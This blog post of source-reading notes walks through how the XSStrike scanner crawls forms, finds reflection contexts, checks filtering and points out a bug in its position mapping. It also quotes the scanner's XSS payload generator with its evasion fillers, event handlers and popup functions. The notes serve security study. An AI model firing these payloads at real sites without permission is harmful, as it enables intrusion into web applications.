XSStrike Source Code Reading Notes (1): Crawling Mode

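XSStrike is probably the most advanced XSS scanner among open-source projects today. Reading a project of this quality teaches us a lot, both about automated XSS detection and about project development.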

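Introduction to XSStrike

XSStrike mainly targets reflected XSS and DOM XSS. It does not drive an automated browser; every request goes through the requests library. This means it cannot test pages rendered by JavaScript, and its DOM XSS analysis is done entirely through semantic analysis of the returned source.

XSStrike has four main modes: Scan mode (tests a given URL directly), Crawling mode, Fuzz mode and Bruteforcer mode. Together with some auxiliary features, they cover XSS scanning well.

Crawling mode crawls links from the target page and tests them. It exercises all of XSStrike's core functionality, so I chose to analyse it first.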

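Crawling links to test

This functionality lives in core/photon.py. By convention it returns a list of forms. For ease of description, I describe a form as a Golang struct (static typing is just nice):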

type form struct {
	action Url
	method string
	inputs httpParams
}

For a given target, the target itself is first converted into the form format:

def rec(target):
    ... ...
    url = getUrl(target, True)
    params = getParams(target, '', True)
    if '=' in target:  # if there's a = in the url, there should be GET parameters
        inps = []
        for name, value in params.items():
            inps.append({'name': name, 'value': value})
        forms.append({0: {'action': url, 'method': 'get', 'inputs': inps}})
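
The same conversion can be sketched with the standard library alone. This is only an illustration, not XSStrike's code: url_to_form is a hypothetical helper, and it uses urllib.parse in place of the project's getUrl and getParams.

```python
from urllib.parse import urlsplit, parse_qsl

def url_to_form(target):
    """Turn a URL with a query string into a form-like dict (hypothetical helper)."""
    parts = urlsplit(target)
    # Rebuild the URL without the query string or fragment
    action = f"{parts.scheme}://{parts.netloc}{parts.path}"
    inputs = [
        {"name": name, "value": value}
        for name, value in parse_qsl(parts.query, keep_blank_values=True)
    ]
    return {"action": action, "method": "get", "inputs": inputs}

form = url_to_form("http://example.com/search?q=test&page=1")
print(form)
```

Every GET parameter becomes one entry in inputs, which matches the shape that the rest of the crawler expects.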

Then the target page is fetched and its <form> tags are parsed to obtain the form contents:

response = requester(url, params, headers, True, delay, timeout).text
forms.append(zetanize(response))

def zetanize(response):
    ... ...
    forms = {}
    matches = re.findall(r'(?i)(?s)<form.*?</form.*?>',
                         response)  # extract all the forms
    num = 0
    for match in matches:  # everything else is self explanatory if you know regex
        page = re.search(r'(?i)action=[\'"](.*?)[\'"]', match)
        method = re.search(r'(?i)method=[\'"](.*?)[\'"]', match)
        forms[num] = {}
        forms[num]['action'] = d(e(page.group(1))) if page else ''
        forms[num]['method'] = d(
            e(method.group(1)).lower()) if method else 'get'
        forms[num]['inputs'] = []
        inputs = re.findall(r'(?i)(?s)<input.*?>', response)
        for inp in inputs:
            inpName = re.search(r'(?i)name=[\'"](.*?)[\'"]', inp)
            if inpName:
                inpType = re.search(r'(?i)type=[\'"](.*?)[\'"]', inp)
                inpValue = re.search(r'(?i)value=[\'"](.*?)[\'"]', inp)
                inpName = d(e(inpName.group(1)))
                inpType = d(e(inpType.group(1)))if inpType else ''
                inpValue = d(e(inpValue.group(1))) if inpValue else ''
                if inpType.lower() == 'submit' and inpValue == '':
                    inpValue = 'Submit Query'
                inpDict = {
                    'name': inpName,
                    'type': inpType,
                    'value': inpValue
                }
                forms[num]['inputs'].append(inpDict)
        num += 1
    return forms

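Note the regular expressions used here to extract the <form> tag attributes. Taking r'(?i)action=[\'"](.*?)[\'"]' as an example, it only matches the forms action="xxxx" and action='xxxx'. In practice, attribute values are sometimes written without quotes, and those cases are not handled correctly. This is something that could be improved.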
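
One possible direction, sketched under my own assumptions: a pattern with three alternatives, for double-quoted, single-quoted and unquoted values. attr_value is a hypothetical helper and the pattern is illustrative; it is not taken from XSStrike or Zetanize.

```python
import re

def attr_value(name, tag):
    """Return the value of attribute `name` in `tag`, quoted or not, else None."""
    # The lookbehind prevents e.g. data-action from being read as action
    pattern = r'(?i)(?<![\w-])%s\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^\s"\'>]+))' % re.escape(name)
    match = re.search(pattern, tag)
    if not match:
        return None
    # Exactly one of the three groups took part in the match
    return next(group for group in match.groups() if group is not None)

tag = '<form action="/login" method=post>'
print(attr_value('action', tag), attr_value('method', tag))
```

A real HTML parser would be more robust still; the regex version is shown only because it stays close to the original approach.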

After that, the <a> tags in the page are matched, links with static file extensions are filtered out, and the remaining links are passed back to rec to crawl the next level. (The regex here has the same problem.)

matches = re.findall(r'<[aA].*href=["\']{0,1}(.*?)["\']', response)
for link in matches:  # iterate over the matches
    # remove everything after a "#" to deal with in-page anchors
    link = link.split('#')[0]
    if link.endswith(('.pdf', '.png', '.jpg', '.jpeg', '.xls', '.xml', '.docx', '.doc')):
        pass
    else:
        ... ...
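
For comparison, here is a small sketch that collects links with the standard library's html.parser instead of a regex, which also copes with unquoted href values. LinkCollector and extract_links are names I made up for this example; the extension list is the one from the excerpt above.

```python
from html.parser import HTMLParser

STATIC_EXTENSIONS = ('.pdf', '.png', '.jpg', '.jpeg', '.xls', '.xml', '.docx', '.doc')

class LinkCollector(HTMLParser):
    """Collects href values from <a> tags, whether quoted or not."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag != 'a':  # HTMLParser lowercases tag and attribute names
            return
        for name, value in attrs:
            if name == 'href' and value:
                link = value.split('#')[0]  # drop in-page anchors
                if link and not link.lower().endswith(STATIC_EXTENSIONS):
                    self.links.append(link)

def extract_links(html):
    collector = LinkCollector()
    collector.feed(html)
    return collector.links

page = '<a href=/one>1</a> <A HREF="/two#top">2</A> <a href=\'/doc.pdf\'>3</a>'
print(extract_links(page))
```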

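With that, the links to test have all been crawled.

PS: the author has already extracted the link-crawling and <form>-parsing features used above into standalone Python libraries: Photon and Zetanize.

Running the tests

This part lives in modes/crawl.py. The main logic is:

First iterate over the parameters, finding and recording each reflection point and its context
Based on the context, select the special characters that could lead to XSS and check whether they are filtered
Generate payloads

Finding reflection points

Iterate over each parameter of the target, set the parameter value to a special string, and send the request.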

def crawl(scheme, host, main_url, form, blindXSS, blindPayload, headers, delay, timeout, encoding):
    if form:
        for each in form.values():
            url = each['action']
            if url:
                ... ...
                if url not in core.config.globalVariables['checkedForms']:
                    core.config.globalVariables['checkedForms'][url] = []
                method = each['method']
                GET = True if method == 'get' else False
                inputs = each['inputs']
                paramData = {}
                for one in inputs:
                    paramData[one['name']] = one['value']
                    for paramName in paramData.keys():
                        if paramName not in core.config.globalVariables['checkedForms'][url]:
                            core.config.globalVariables['checkedForms'][url].append(paramName)
                            paramsCopy = copy.deepcopy(paramData)
                            paramsCopy[paramName] = xsschecker
                            response = requester(url, paramsCopy, headers, GET, delay, timeout)

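The response is passed to htmlParser for analysis. Using the special string that was set, it counts the reflection points and strips HTML comments (remember this step):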

occurences = htmlParser(response, encoding)

def htmlParser(response, encoding):
    rawResponse = response  # raw response returned by requests
    response = response.text  # response content
    if encoding:  # if the user has specified an encoding, encode the probe in that
        response = response.replace(encoding(xsschecker), xsschecker)
    reflections = response.count(xsschecker)
    position_and_context = {}
    environment_details = {}
    clean_response = re.sub(r'<!--[.\s\S]*?-->', '', response)

It first looks for reflection points inside <script></script> and checks whether each one is wrapped in quotes:

script_checkable = clean_response
for script in extractScripts(script_checkable):
    occurences = re.finditer(r'(%s.*?)$' % xsschecker, script)
    if occurences:
        for occurence in occurences:
            thisPosition = occurence.start(1)
            position_and_context[thisPosition] = 'script'
            environment_details[thisPosition] = {}
            environment_details[thisPosition]['details'] = {'quote' : ''}
            for i in range(len(occurence.group())):
                currentChar = occurence.group()[i]
                if currentChar in ('/', '\'', '`', '"') and not escaped(i, occurence.group()):
                    environment_details[thisPosition]['details']['quote'] = currentChar
                elif currentChar in (')', ']', '}', '}') and not escaped(i, occurence.group()):
                    break
            script_checkable = script_checkable.replace(xsschecker, '', 1)

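It then looks for reflection points inside tags and determines whether the reflected position is an attribute name, an attribute value, or a flag: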

if len(position_and_context) < reflections:
    attribute_context = re.finditer(r'<[^>]*?(%s)[^>]*?>' % xsschecker, clean_response)
    for occurence in attribute_context:
        match = occurence.group(0)
        thisPosition = occurence.start(1)
        parts = re.split(r'\s', match)
        tag = parts[0][1:]
        for part in parts:
            if xsschecker in part:
                Type, quote, name, value = '', '', '', ''
                if '=' in part:
                    quote = re.search(r'=([\'`"])?', part).group(1)
                    name_and_value = part.split('=')[0], '='.join(part.split('=')[1:])
                    if xsschecker == name_and_value[0]:
                        Type = 'name'
                    else:
                        Type = 'value'
                    name = name_and_value[0]
                    value = name_and_value[1].rstrip('>').rstrip(quote).lstrip(quote)
                else:
                    Type = 'flag'
                position_and_context[thisPosition] = 'attribute'
                environment_details[thisPosition] = {}
                environment_details[thisPosition]['details'] = {'tag' : tag, 'type' : Type, 'quote' : quote, 'value' : value, 'name' : name}

Finally it looks for reflection points outside tags and inside comments:

if len(position_and_context) < reflections:
    html_context = re.finditer(xsschecker, clean_response)
    for occurence in html_context:
        thisPosition = occurence.start()
        if thisPosition not in position_and_context:
            position_and_context[occurence.start()] = 'html'
            environment_details[thisPosition] = {}
            environment_details[thisPosition]['details'] = {}
if len(position_and_context) < reflections:
    comment_context = re.finditer(r'<!--[\s\S]*?(%s)[\s\S]*?-->' % xsschecker, response)
    for occurence in comment_context:
        thisPosition = occurence.start(1)
        position_and_context[thisPosition] = 'comment'
        environment_details[thisPosition] = {}
        environment_details[thisPosition]['details'] = {}

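This part also has a few problems:

As mentioned above, attribute values are not necessarily quoted
The reference frame of thisPosition changes

As we can see, when the reflection point is inside a <script> tag, thisPosition is its offset within the string inside the <script> tag; when the reflection point is inside a tag, thisPosition is its offset within the clean_response string. This can produce duplicate thisPosition values, so that records in position_and_context and environment_details get overwritten. It also means that reflection points wrapped in <script> are counted again when reflection points outside tags are computed. As a result, reflection points inside comments may be ignored, and some work is wasted.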
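
To make the collision concrete, here is a contrived sketch. The page content and the probe value are made up, and the script-extraction regex is a simplified stand-in for extractScripts; only the attribute-context regex is the one quoted above.

```python
import re

probe = 'v3dm0s'  # stand-in for xsschecker; the exact value does not matter here
html = '<a id=v3dm0s>x</a><script>ab = "v3dm0s";</script>'

# Offset measured inside the script body only
script_body = re.search(r'(?s)<script[^>]*>(.*?)</script>', html).group(1)
script_offset = script_body.index(probe)

# Offset measured inside the whole document
attribute_offsets = [m.start(1) for m in re.finditer(r'<[^>]*?(%s)[^>]*?>' % probe, html)]

position_and_context = {script_offset: 'script'}
for offset in attribute_offsets:
    position_and_context[offset] = 'attribute'  # silently overwrites the script entry

print(html.count(probe), position_and_context)
```

Both offsets happen to be 6, one relative to the script body and one relative to the document, so two reflections end up as a single dictionary entry.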

Of course, not every reflection point can be exploited directly, so the next step marks reflection points that are wrapped in special tags (badTag):

bad_contexts = re.finditer(r'(?s)(?i)<(style|template|textarea|title|noembed|noscript)>[.\s\S]*(%s)[.\s\S]*</\1>' % xsschecker, response)
non_executable_contexts = []
for each in bad_contexts:
    non_executable_contexts.append([each.start(), each.end(), each.group(1)])

if non_executable_contexts:
    for key in database.keys():
        position = database[key]['position']
        badTag = isBadContext(position, non_executable_contexts)
        if badTag:
            database[key]['details']['badTag'] = badTag
        else:
            database[key]['details']['badTag'] = ''

The final database is a dictionary containing all the reflection point information we need.
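
The excerpt calls isBadContext without showing it. Judging only from how it is called, I assume it is a simple range check; the sketch below is my own guess at that behaviour (is_bad_context is a hypothetical name), not the project's implementation.

```python
def is_bad_context(position, non_executable_contexts):
    """Return the name of the enclosing non-executable tag, or '' if there is none."""
    for start, end, tag in non_executable_contexts:
        if start < position < end:
            return tag
    return ''

# Each entry is [match start, match end, tag name], as built in the loop above
contexts = [[120, 180, 'textarea'], [300, 350, 'title']]
print(is_bad_context(150, contexts))
```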

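Checking how reflection points are filtered

We now have the context of each reflection point, in detail: whether it is wrapped in a <script> tag, whether it is inside a tag, whether it is an attribute name or an attribute value, and whether it is wrapped in single quotes, double quotes, or backticks. Following the usual manual XSS hunting approach, the next step is to analyse whether the reflection point in each context can break out and cause XSS.

This is done by filterChecker: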

efficiencies = filterChecker(url, paramsCopy, headers, GET, delay, occurences, timeout, encoding)

First, based on the context, it selects the characters needed to break out:

def filterChecker(url, params, headers, GET, delay, occurences, timeout, encoding):
    positions = occurences.keys()
    sortedEfficiencies = {}
    # adding < > to environments anyway because they can be used in all contexts
    environments = set(['<', '>'])
    for i in range(len(positions)):
        sortedEfficiencies[i] = {}
    for i in occurences:
        occurences[i]['score'] = {}
        context = occurences[i]['context']
        if context == 'comment':
            environments.add('-->')
        elif context == 'script':
            environments.add(occurences[i]['details']['quote'])
            environments.add('</scRipT/>')
        elif context == 'attribute':
            if occurences[i]['details']['type'] == 'value':
                if occurences[i]['details']['name'] == 'srcdoc':  # srcdoc attribute accepts html data with html entity encoding
                    environments.add('&lt;')  # so let's add the html entity
                    environments.add('&gt;')  # encoded versions of < and >
            if occurences[i]['details']['quote']:
                environments.add(occurences[i]['details']['quote'])

These are then passed to checker to test whether the characters are filtered:

    for environment in environments:
        if environment:
            efficiencies = checker(url, params, headers, GET, delay, environment, positions, timeout, encoding)
            efficiencies.extend([0] * (len(occurences) - len(efficiencies)))
            for occurence, efficiency in zip(occurences, efficiencies):
                occurences[occurence]['score'][environment] = efficiency
    return occurences

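Let us first think about what checker should do. Naturally, it should send each special character as the parameter value and check whether the response contains it unescaped. To make the reflection points easy to locate, the special character under test needs to be wrapped in distinctive markers on both sides.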
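
In its simplest form, that idea looks like the sketch below. survives_unescaped is a hypothetical helper, the two responses are simulated strings rather than real requests, and the markers are the ones XSStrike's checker uses.

```python
def survives_unescaped(response_text, payload, start='st4r7s', end='3nd'):
    """True if the payload appears verbatim between the two markers."""
    return (start + payload + end) in response_text

# Simulated server responses; no network request is made here
raw_echo = '<div>st4r7s<3nd</div>'
escaped_echo = '<div>st4r7s&lt;3nd</div>'

print(survives_unescaped(raw_echo, '<'), survives_unescaped(escaped_echo, '<'))
```

This exact-match check only answers yes or no for the page as a whole. The real checker goes further and tries to score each reflection point separately, which is where the complications below come from.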

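The logic looks simple, yet the actual implementation of checker is confusing, and it also contains a fatal bug.

Let us look at checker's return value first, list(filter(None, efficiencies)). What it returns is a list of likelihoods that the special character was not filtered, with results whose likelihood is 0 filtered out.

Combined with the code in filterChecker that handles checker's return value, the most important thing is to map the contents of list(filter(None, efficiencies)) onto the correct reflection points: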

for occurence, efficiency in zip(occurences, efficiencies):
    occurences[occurence]['score'][environment] = efficiency

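Achieving this mapping runs into some problems. For example, when our test character is blocked in a way that makes the whole reflection point disappear (rather than just the test character being filtered), there is one reflection point fewer, and therefore one efficiency fewer. If the list were returned as is, the mapping between reflection points and efficiencies would be scrambled. The fillHoles function exists to solve this: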

def fillHoles(original, new):
    filler = 0
    filled = []
    for x, y in zip(original, new):
        if int(x) == (y + filler):
            filled.append(y)
        else:
            filled.extend([0, y])
            filler += (int(x) - y)
    return filled

def checker(url, params, headers, GET, delay, payload, positions, timeout, encoding):
    checkString = 'st4r7s' + payload + '3nd'
    response = requester(url, replaceValue(params, xsschecker, checkString, copy.deepcopy), headers, GET, delay, timeout).text.lower()
    reflectedPositions = []
    for match in re.finditer('st4r7s', response):
        reflectedPositions.append(match.start())
    filledPositions = fillHoles(positions, reflectedPositions)

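As we can see, to solve this problem fillHoles takes the original reflection positions as a parameter and compares them one by one with the newly obtained positions. If a new position, adjusted by the accumulated filler offset, does not equal the corresponding old position, a reflection point is assumed to be missing in front of it, and a 0 is inserted to fill the gap.

But there is a fatal problem here, similar to the one described earlier: the reference frame of the positions. Every oldPosition is an offset into clean_response (the response with comments stripped), while every newPosition is an offset into response, so the two sets of positions almost never line up. Of course, fixing this takes more than accounting for the stripped comments; many other factors affect these positions, which I will not go into here.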
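
A quick experiment shows both the intended behaviour and the failure. fillHoles is copied from the listing above so the snippet runs on its own; the position lists are numbers I made up.

```python
def fillHoles(original, new):
    # Copied verbatim from the listing above
    filler = 0
    filled = []
    for x, y in zip(original, new):
        if int(x) == (y + filler):
            filled.append(y)
        else:
            filled.extend([0, y])
            filler += (int(x) - y)
    return filled

# Intended case: the middle reflection disappeared, so a 0 marks the hole
intended = fillHoles([10, 50, 90], [10, 90])

# Problem case: all three reflections are present, but their offsets shifted
shifted = fillHoles([10, 50, 90], [10, 54, 98])

print(intended, shifted)
```

In the second call nothing is actually missing, yet two holes are reported, because a shifted offset is indistinguishable from a missing reflection.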

Let us keep reading:

    num = 0
    efficiencies = []
    for position in filledPositions:
        allEfficiencies = []
        try:
            reflected = response[reflectedPositions[num]
                :reflectedPositions[num]+len(checkString)]
            efficiency = fuzz.partial_ratio(reflected, checkString.lower())
            allEfficiencies.append(efficiency)
        except IndexError:
            pass
        if position:
            reflected = response[position:position+len(checkString)]
            if encoding:
                checkString = encoding(checkString.lower())
            efficiency = fuzz.partial_ratio(reflected, checkString)
            if reflected[:-2] == ('\\%s' % checkString.replace('st4r7s', '').replace('3nd', '')):
                efficiency = 90
            allEfficiencies.append(efficiency)
            efficiencies.append(max(allEfficiencies))
        else:
            efficiencies.append(0)
        num += 1
    return list(filter(None, efficiencies))

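The key is the last line: on return, zero values are filtered out indiscriminately. Combined with the problem described above, this has a fatal consequence: when filterChecker finally pairs reflection points with efficiencies, the mapping is scrambled, and a reflection point that cannot break out is mistaken for one that can.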
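
The misalignment can be reproduced in a few lines. The labels and scores are made up for illustration; the two list operations are the ones used by checker and filterChecker.

```python
occurrences = ['first', 'second', 'third']  # hypothetical reflection point labels
efficiencies = [100, 0, 90]                 # the second reflection was fully filtered

# What checker returns: zeros are dropped
returned = list(filter(None, efficiencies))

# What filterChecker does with it: pad at the end, then zip by order
returned.extend([0] * (len(occurrences) - len(returned)))
scores = dict(zip(occurrences, returned))

print(scores)
```

The score of 90 that belongs to the third reflection point lands on the second one, which was the one that could not break out.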

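The cause and effect here span quite a lot of code and may be hard to follow from reading alone, so I provide a DEMO that can be used to verify this bug.

Generating payloads

Setting the above problem aside, let us continue. We now have every reflection point and know whether the characters needed to break out of it are filtered, so we can generate payloads.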

vectors = generator(occurences, response.text)

The idea here is fairly simple, so I will not go through all the code; I only take output outside of tags as an example:

def generator(occurences, response):
        scripts = extractScripts(response)
        index = 0
        vectors = {11: set(), 10: set(), 9: set(), 8: set(), 7: set(),6: set(), 5: set(), 4: set(), 3: set(), 2: set(), 1: set()}
        for i in occurences:
            context = occurences[i]['context']
            if context == 'html':
                lessBracketEfficiency = occurences[i]['score']['<']
                greatBracketEfficiency = occurences[i]['score']['>']
                ends = ['//']
                badTag = occurences[i]['details']['badTag'] if 'badTag' in occurences[i]['details'] else ''
                if greatBracketEfficiency == 100:
                    ends.append('>')
                if lessBracketEfficiency:
                    payloads = genGen(fillings, eFillings, lFillings,
                                      eventHandlers, tags, functions, ends, badTag)
                    for payload in payloads:
                        vectors[10].add(payload)
            elif context == 'attribute':
                    ... ...
            elif context == 'comment':
                    ... ...
            elif context == 'script':
                    ... ...
        return vectors

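Focus on genGen: this is the function that actually assembles the payloads. It takes the following global variables and, together with the characters the reflection point needs in order to break out, concatenates them into payloads: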

tags = ('html', 'd3v', 'a', 'details')  # HTML Tags

# "Things" that can be used between js functions and breakers e.g. '};alert()//
jFillings = (';')
# "Things" that can be used before > e.g. <tag attr=value%0dx>
lFillings = ('', '%0dx')
# "Things" to use between event handler and = or between function and =
eFillings = ('%09', '%0a', '%0d',  '+')
fillings = ('%09', '%0a', '%0d', '/+/')  # "Things" to use instead of space

eventHandlers = {  # Event handlers and the tags compatible with them
    'ontoggle': ['details'],
    'onpointerenter': ['d3v', 'details', 'html', 'a'],
    'onmouseover': ['a', 'html', 'd3v']
}

functions = (  # JavaScript functions to get a popup
    '[8].find(confirm)', 'confirm()',
    '(confirm)()', 'co\u006efir\u006d()',
    '(prompt)``', 'a=prompt,a()')

def genGen(fillings, eFillings, lFillings, eventHandlers, tags, functions, ends, badTag=None):
    vectors = []
    r = randomUpper  # randomUpper randomly converts chars of a string to uppercase
    for tag in tags:
        if tag == 'd3v' or tag == 'a':
            bait = xsschecker
        else:
            bait = ''
        for eventHandler in eventHandlers:
            # if the tag is compatible with the event handler
            if tag in eventHandlers[eventHandler]:
                for function in functions:
                    for filling in fillings:
                        for eFilling in eFillings:
                            for lFilling in lFillings:
                                for end in ends:
                                    if tag == 'd3v' or tag == 'a':
                                        if '>' in ends:
                                            end = '>'  # we can't use // as > with "a" or "d3v" tag
                                    breaker = ''
                                    if badTag:
                                        breaker = '</' + r(badTag) + '>'
                                    vector = breaker + '<' + r(tag) + filling + r(
                                        eventHandler) + eFilling + '=' + eFilling + function + lFilling + end + bait
                                    vectors.append(vector)
    return vectors
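
Stripped of the random casing, the bait and the badTag breaker, genGen is essentially a filtered Cartesian product. The sketch below is a reduced version of my own (simple_vectors is a hypothetical name, and the inputs are a small subset of the tuples above), meant only to show that structure.

```python
from itertools import product

def simple_vectors(tags, event_handlers, functions, fillings, ends):
    """Combine every compatible tag/handler pair with each function, filling and end."""
    vectors = []
    for tag, (handler, allowed), function, filling, end in product(
            tags, event_handlers.items(), functions, fillings, ends):
        if tag in allowed:  # keep only handlers that work on this tag
            vectors.append('<' + tag + filling + handler + '=' + function + end)
    return vectors

demo = simple_vectors(
    tags=('details', 'a'),
    event_handlers={'ontoggle': ['details'], 'onmouseover': ['a']},
    functions=('confirm()',),
    fillings=('%09',),
    ends=('//', '>'),
)
print(demo)
```

With the full tuples the number of combinations grows quickly, which is why the real function returns a long list for a single reflection point.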

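Two things are worth noting here. One is the handling of badTag; the other is the structure of vectors. It divides payloads into 11 levels from high to low; the higher the level, the more effective the payload (for example, payloads that need no user interaction rank higher). When the results are printed, higher-level payloads are naturally output first: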

if vectors:
    for confidence, vects in vectors.items():
        try:
            payload = list(vects)[0]
            logger.vuln('Vulnerable webpage: %s%s%s' %
                        (green, url, end))
            logger.vuln('Vector for %s%s%s: %s' %
                        (green, paramName, end, payload))
            break
        except IndexError:
            pass
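
The loop above depends on the dictionary having been created with its keys in descending order. A variant that makes the ordering explicit could look like this; best_vector is a hypothetical helper and the two payload strings are placeholders for illustration.

```python
def best_vector(vectors):
    """Return (confidence, payload) for the highest non-empty level, or None."""
    for confidence in sorted(vectors, reverse=True):
        candidates = sorted(vectors[confidence])  # sorted for a deterministic choice
        if candidates:
            return confidence, candidates[0]
    return None

vectors = {level: set() for level in range(11, 0, -1)}
vectors[10].add('<details ontoggle=confirm()>')
vectors[6].add("'-confirm()-'")

print(best_vector(vectors))
```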

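Summary

That more or less completes the analysis of Crawling mode, and with it the principles behind how XSStrike scans for vulnerabilities. What remains is the functionality of the other modes and the implementation of some auxiliary modules (such as WafDetect), which I will cover later.

As we can see, the way XSStrike detects XSS is actually quite simple: it essentially turns the process of hunting for XSS by hand into code. Compared with the fancier implementations in other scanners, it is simpler yet more effective. (One more aside: XSStrike's code quality is really high. The project structure is clear and the code is concise and readable, far better than that of certain other projects...)

That said, XSStrike still has some bugs and room for improvement. These problems are also hard ones for the industry as a whole; I thought about it for a long time and could not come up with an effective replacement for fillHoles. I look forward to discussing it with anyone who has ideas.

PS: having written this far, I find that I am still not very good at technical writing, and even less so at source-reading notes. I keep trying to describe my understanding in my own words, yet feel I am not describing it clearly, and end up being long-winded. I just need more practice.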

Li4n0's NoteBook
